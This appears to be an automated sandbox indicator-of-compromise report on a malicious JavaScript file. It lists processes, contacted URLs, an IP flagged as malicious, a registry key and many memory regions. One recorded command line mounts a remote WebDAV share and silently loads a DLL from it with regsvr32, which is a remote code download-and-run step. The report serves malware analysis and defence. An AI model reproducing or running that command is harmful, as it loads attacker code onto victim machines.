IOC Report
12914116852002317391.js

loading gif

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\12914116852002317391.js"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1&&cmd /c net use \\94.159.113.84@8888\davwwwroot\ && cmd /c regsvr32 /s \\94.159.113.84@8888\davwwwroot\3951701412872.dll
malicious
C:\Windows\System32\cmd.exe
cmd /c net use \\94.159.113.84@8888\davwwwroot\
malicious
C:\Windows\System32\net.exe
net use \\94.159.113.84@8888\davwwwroot\
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\timeout.exe
timeout 1

URLs

Name
IP
Malicious
http://94.159.113.84:8888/P
unknown
http://94.159.113.84:8888/tem=
unknown
http://94.159.113.84:8888/
unknown
http://94.159.113.84:8888/T
unknown

IPs

IP
Domain
Country
Malicious
94.159.113.84
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
1CD8C9A6000
heap
page read and write
1CD8C5A7000
heap
page read and write
80AFC7C000
stack
page read and write
1CD8C9A6000
heap
page read and write
1CD8C9A4000
heap
page read and write
1CD8AAFA000
heap
page read and write
1CD8AAFD000
heap
page read and write
1CD8C5DB000
heap
page read and write
1CD8C691000
heap
page read and write
1CD8C5EF000
heap
page read and write
1CD8C9BA000
heap
page read and write
18271ED0000
heap
page read and write
18271E30000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C5BC000
heap
page read and write
1CD8C9A2000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8CABD000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C9A3000
heap
page read and write
1CD8CB83000
heap
page read and write
23C5DA40000
heap
page read and write
23C5DA45000
heap
page read and write
967C0FF000
stack
page read and write
1CD8CABD000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C5A7000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8A947000
heap
page read and write
1CD8C748000
heap
page read and write
1CD8C9B1000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8CA09000
heap
page read and write
1CD8C9BC000
heap
page read and write
967BDAC000
stack
page read and write
1CD8C735000
heap
page read and write
1CD8A890000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C595000
heap
page read and write
1CD8C66B000
heap
page read and write
1CD8C791000
heap
page read and write
1CD8A959000
heap
page read and write
18271D65000
heap
page read and write
1CD8A958000
heap
page read and write
25D1799000
stack
page read and write
80AFB7E000
stack
page read and write
1CD8C690000
heap
page read and write
1CD8A888000
heap
page read and write
1CD8AAF5000
heap
page read and write
1CD8C5C7000
heap
page read and write
1CD8C61B000
heap
page read and write
1CD8A948000
heap
page read and write
1CD8C240000
heap
page read and write
1CD8C59C000
heap
page read and write
1CD8C997000
heap
page read and write
1CD8C603000
heap
page read and write
1CD8C595000
heap
page read and write
1CD8C9AB000
heap
page read and write
1CD8A8A1000
heap
page read and write
1CD8C5B5000
heap
page read and write
18271D6D000
heap
page read and write
18271E90000
remote allocation
page read and write
1CD8C5A7000
heap
page read and write
23C5BE00000
heap
page read and write
1CD8C5B4000
heap
page read and write
1CD8A6D0000
heap
page read and write
18271E90000
remote allocation
page read and write
1CD8A860000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C998000
heap
page read and write
18271DA9000
heap
page read and write
1CD8C999000
heap
page read and write
1CD8C591000
heap
page read and write
1CD8C5A7000
heap
page read and write
1CD8CA5D000
heap
page read and write
25D23FC000
stack
page read and write
1CD8CABD000
heap
page read and write
1CD8AAFA000
heap
page read and write
1CD8C633000
heap
page read and write
1CD8C9BC000
heap
page read and write
1CD8C590000
heap
page read and write
1CD8C748000
heap
page read and write
25D1EFF000
stack
page read and write
25D1DFF000
stack
page read and write
18271E90000
remote allocation
page read and write
80AFAFF000
stack
page read and write
1CD8C5B4000
heap
page read and write
1CD8AAFA000
heap
page read and write
1CD8C990000
heap
page read and write
1CD8A938000
heap
page read and write
1CD8C99A000
heap
page read and write
1CD8C64F000
heap
page read and write
1CD8C5BC000
heap
page read and write
1CD8C878000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C687000
heap
page read and write
1CD8C994000
heap
page read and write
1CD8C9AA000
heap
page read and write
1CD8C728000
heap
page read and write
1CD8A7B0000
heap
page read and write
1CD8A94B000
heap
page read and write
1CD8AAF0000
heap
page read and write
1CD8A94C000
heap
page read and write
80AFA7A000
stack
page read and write
1CD8C5A4000
heap
page read and write
1CD8C9BD000
heap
page read and write
1CD8C9AE000
heap
page read and write
1CD8C9A6000
heap
page read and write
23C5BF20000
heap
page read and write
1CD8CABE000
heap
page read and write
1CD8A953000
heap
page read and write
1CD8AAF9000
heap
page read and write
18271D95000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C9BC000
heap
page read and write
25D1BFE000
stack
page read and write
18271C40000
heap
page read and write
1CD8C9A3000
heap
page read and write
1CD8CABD000
heap
page read and write
1CD8CABD000
heap
page read and write
1CD8C992000
heap
page read and write
1CD8C878000
heap
page read and write
1CD8C5B4000
heap
page read and write
1CD8A94D000
heap
page read and write
1CD8C9AA000
heap
page read and write
25D1AFE000
stack
page read and write
25D21FD000
stack
page read and write
1CD8C992000
heap
page read and write
1CD8C68E000
heap
page read and write
18271E50000
heap
page read and write
1CD8C5A7000
heap
page read and write
80AFBFE000
stack
page read and write
18271D38000
heap
page read and write
23C5BFD8000
heap
page read and write
1CD8C992000
heap
page read and write
18271DAF000
heap
page read and write
1CD8A938000
heap
page read and write
25D20FE000
stack
page read and write
1CD8C9A9000
heap
page read and write
23C5BFD0000
heap
page read and write
23C5BEE0000
heap
page read and write
1CD8C5B4000
heap
page read and write
1CD8CABD000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8C9AC000
heap
page read and write
1CD8C9A3000
heap
page read and write
18271D5E000
heap
page read and write
1CD8C5B7000
heap
page read and write
1CD8C996000
heap
page read and write
1CD8A890000
heap
page read and write
1CD8C592000
heap
page read and write
1CD8A868000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8AAFE000
heap
page read and write
1CD8C735000
heap
page read and write
1CD8C59C000
heap
page read and write
1CD8C790000
heap
page read and write
18271ED5000
heap
page read and write
1CD8C9E1000
heap
page read and write
1CD8CA31000
heap
page read and write
1CD8A7D0000
heap
page read and write
1CD8C68E000
heap
page read and write
1CD8CA8D000
heap
page read and write
18271D30000
heap
page read and write
1CD8CABD000
heap
page read and write
25D1FFF000
stack
page read and write
18271D5E000
heap
page read and write
1CD8C597000
heap
page read and write
1CD8C9AA000
heap
page read and write
1CD8C99C000
heap
page read and write
80AFCFF000
stack
page read and write
1CD8C991000
heap
page read and write
1CD8C9A9000
heap
page read and write
18271D83000
heap
page read and write
1CD8C5B8000
heap
page read and write
1CD8C9A6000
heap
page read and write
967C07F000
stack
page read and write
1CD8C9A1000
heap
page read and write
18271D68000
heap
page read and write
1CD8A889000
heap
page read and write
1CD8C59A000
heap
page read and write
1CD8A94A000
heap
page read and write
1CD8C99B000
heap
page read and write
1CD8A954000
heap
page read and write
There are 174 hidden memdumps, click here to show them.